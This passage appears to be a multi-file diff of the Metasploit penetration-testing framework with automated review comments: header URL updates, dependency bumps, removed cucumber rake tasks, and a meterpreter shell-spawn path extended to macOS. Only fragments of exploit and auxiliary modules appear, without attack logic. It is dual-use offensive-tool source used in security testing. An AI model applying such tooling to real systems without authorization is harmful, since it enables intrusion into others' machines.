print_error("use '-f' option to provide a filename for playback")
return
end
Rex::Compat.play_sound(::File.expand_path(filename))
end
def cmd_mic_stop
client.mic.mic_stop
end
end
end
end
end
end
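Review bot: `get_data` in `cmd_mic_start` appends the raw audio with `::File.open(file, 'a')`, a text-mode open; on Windows that applies newline translation to binary data, while the header writes in the same method already use `'wb'` and `'rb+'`. `'ab'` keeps the three opens consistent. `cmd_mic_list` calls `client.mic.mic_list` three times (the first result is discarded), each a round trip to the session; `mics = client.mic.mic_list` once, then test and iterate over `mics`. The first two lines shown for the new file, `class Mic` / `end`, precede the `# -*- coding: binary -*-` comment — if that is really the file content rather than a rendering artefact, the magic comment is no longer on line 1 and has no effect, and a bare top-level `Mic` constant is defined; please verify.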


@ -259,7 +259,7 @@ class Console::CommandDispatcher::Stdapi::Sys
print_error( "Failed to spawn shell with thread impersonation. Retrying without it." ) print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
cmd_execute("-f", path, "-c", "-H", "-i") cmd_execute("-f", path, "-c", "-H", "-i")
end end
when 'linux' when 'linux', 'osx'
# Don't expand_path() this because it's literal anyway # Don't expand_path() this because it's literal anyway
path = "/bin/sh" path = "/bin/sh"
cmd_execute("-f", path, "-c", "-i") cmd_execute("-f", path, "-c", "-i")


@ -1,74 +0,0 @@
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
# It is recommended to regenerate this file in the future when you upgrade to a
# newer version of cucumber-rails. Consider adding your own code to a new file
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
# files.
unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
begin
require 'cucumber/rake/task'
namespace :cucumber do
Cucumber::Rake::Task.new({:ok => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'default'
end
Cucumber::Rake::Task.new({:wip => 'db:test:prepare'}, 'Run features that are being worked on') do |t|
t.binary = vendored_cucumber_bin
t.fork = true # You may get faster startup if you set this to false
t.profile = 'wip'
end
Cucumber::Rake::Task.new({:rerun => 'db:test:prepare'}, 'Record failing features and run only them if any exist') do |t|
t.binary = vendored_cucumber_bin
t.fork = true # You may get faster startup if you set this to false
t.profile = 'rerun'
end
desc 'Run all features'
task :all => [:ok, :wip]
task :statsetup do
require 'rails/code_statistics'
::STATS_DIRECTORIES << %w(Cucumber\ features features) if File.exist?('features')
::CodeStatistics::TEST_TYPES << "Cucumber features" if File.exist?('features')
end
end
desc 'Alias for cucumber:ok'
task :cucumber => 'cucumber:ok'
task :default => :cucumber
task :features => :cucumber do
STDERR.puts "*** The 'features' task is deprecated. See rake -T cucumber ***"
end
# In case we don't have ActiveRecord, append a no-op task that we can depend upon.
task 'db:test:prepare' do
end
task 'db:config:restore' do
require 'metasploit/framework/database/cucumber'
Metasploit::Framework::Database::Cucumber.restore_project_configurations
end
# Restore the config/database.yml from config/database.cucumber.yml before attempting to copy development to test
# database in order to recover from interrupted cucumber runs
task 'environment' => 'db:config:restore'
task :stats => 'cucumber:statsetup'
rescue LoadError
desc 'cucumber rake task not available (cucumber not installed)'
task :cucumber do
abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
end
end
end


@ -1,30 +0,0 @@
unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
begin
require 'cucumber/rake/task'
namespace :cucumber do
Cucumber::Rake::Task.new({:boot => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'boot'
end
Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'exploit'
end
end
rescue LoadError
desc 'cucumber rake task not available (cucumber not installed)'
task :cucumber do
abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
end
end
end


@ -13,6 +13,7 @@ end
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'metasploit/framework/version' require 'metasploit/framework/version'
require 'metasploit/framework/rails_version_constraint' require 'metasploit/framework/rails_version_constraint'
require 'msf/util/helper'
Gem::Specification.new do |spec| Gem::Specification.new do |spec|
spec.name = 'metasploit-framework' spec.name = 'metasploit-framework'
@ -24,7 +25,8 @@ Gem::Specification.new do |spec|
spec.homepage = 'https://www.metasploit.com' spec.homepage = 'https://www.metasploit.com'
spec.license = 'BSD-3-clause' spec.license = 'BSD-3-clause'
if File.directory?(File.join(File.dirname(__FILE__), ".git")) # only do a git ls-files if the .git folder exists and we have a git binary in PATH
if File.directory?(File.join(File.dirname(__FILE__), ".git")) && Msf::Util::Helper.which("git")
spec.files = `git ls-files`.split($/).reject { |file| spec.files = `git ls-files`.split($/).reject { |file|
file =~ /^documentation|^external/ file =~ /^documentation|^external/
} }
@ -68,9 +70,9 @@ Gem::Specification.new do |spec|
# are needed when there's no database # are needed when there's no database
spec.add_runtime_dependency 'metasploit-model' spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter # Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.2.37' spec.add_runtime_dependency 'metasploit-payloads', '1.2.44'
# Needed for the next-generation POSIX Meterpreter # Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10' spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
# Needed by msfgui and other rpc components # Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack' spec.add_runtime_dependency 'msgpack'
# get list of network interfaces, like eth* from OS. # get list of network interfaces, like eth* from OS.
@ -134,7 +136,7 @@ Gem::Specification.new do |spec|
# Library for Generating Randomized strings valid as Identifiers such as variable names # Library for Generating Randomized strings valid as Identifiers such as variable names
spec.add_runtime_dependency 'rex-random_identifier' spec.add_runtime_dependency 'rex-random_identifier'
# library for creating Powershell scripts for exploitation purposes # library for creating Powershell scripts for exploitation purposes
spec.add_runtime_dependency 'rex-powershell' spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
# Library for processing and creating Zip compatbile archives # Library for processing and creating Zip compatbile archives
spec.add_runtime_dependency 'rex-zip' spec.add_runtime_dependency 'rex-zip'
# Library for parsing offline Windows Registry files # Library for parsing offline Windows Registry files
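Review bot: The new `rex-powershell` constraint `["< 0.1.73"]` pins an upper bound with no comment recording why, so nobody will know when it is safe to lift it — every other dependency in this block carries a one-line purpose comment. Add the reason alongside, e.g. `# pinned below 0.1.73 until <issue or incompatibility — fill in>`. The `Msf::Util::Helper.which("git")` guard on `git ls-files` is a sound addition, since the shell-out otherwise fails with a confusing error when git is absent.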


@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info={}) def initialize(info={})
@ -131,11 +130,10 @@ class MetasploitModule < Msf::Auxiliary
cookies = res.get_cookies cookies = res.get_cookies
if cookies && cookies.match(/(.*); path=\//) if cookies && cookies.match(/(.*); path=\//)
cookie= $1 cookie= $1
print_status("Got cookie #{cookie}. Password reset was successful!\n") print_good("Got cookie #{cookie}. Password reset was successful!\n")
end end
end end
end end
end end
end end


@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -178,5 +177,4 @@ class MetasploitModule < Msf::Auxiliary
def run def run
exploit exploit
end end
end end


@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})


@ -1,12 +1,11 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'uri' require 'uri'
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -152,5 +151,4 @@ class MetasploitModule < Msf::Auxiliary
print_status("Video request sent. Duration set: #{datastore['TIME']} seconds") print_status("Video request sent. Duration set: #{datastore['TIME']} seconds")
play_video_uri play_video_uri
end end
end end


@ -1,6 +1,5 @@
## ##
# encoding: utf-8 # This module requires Metasploit: https://metasploit.com/download
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -1,12 +1,11 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'metasploit/framework/aws/client' require 'metasploit/framework/aws/client'
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Metasploit::Framework::Aws::Client include Metasploit::Framework::Aws::Client
def initialize(info = {}) def initialize(info = {})


@ -1,12 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::NDMP include Msf::Exploit::Remote::NDMP
def initialize(info = {}) def initialize(info = {})
@ -271,5 +268,4 @@ class MetasploitModule < Msf::Auxiliary
disconnect disconnect
end end
end end


@ -1,12 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::DCERPC
include Msf::Post::Windows::Registry include Msf::Post::Windows::Registry
@ -270,5 +267,4 @@ class MetasploitModule < Msf::Auxiliary
NDR.long(hive) NDR.long(hive)
return stub return stub
end end
end end


@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -79,5 +78,4 @@ class MetasploitModule < Msf::Auxiliary
disconnect disconnect
end end
end end
end end


@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
@ -85,5 +84,4 @@ class MetasploitModule < Msf::Auxiliary
disconnect disconnect
end end
end end
end end


@ -1,9 +1,9 @@
## ##
# auxiliary/admin/cisco/cisco_asa_extrabacon.rb # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Cisco include Msf::Auxiliary::Cisco
@ -219,5 +219,4 @@ class MetasploitModule < Msf::Auxiliary
ver ver
end end
end end


@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner


@ -1,12 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})


@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client
def initialize(info = {}) def initialize(info = {})


@ -1,8 +1,9 @@
# -*- coding: binary -*- # -*- coding: binary -*-
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'dnsruby' require 'dnsruby'
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
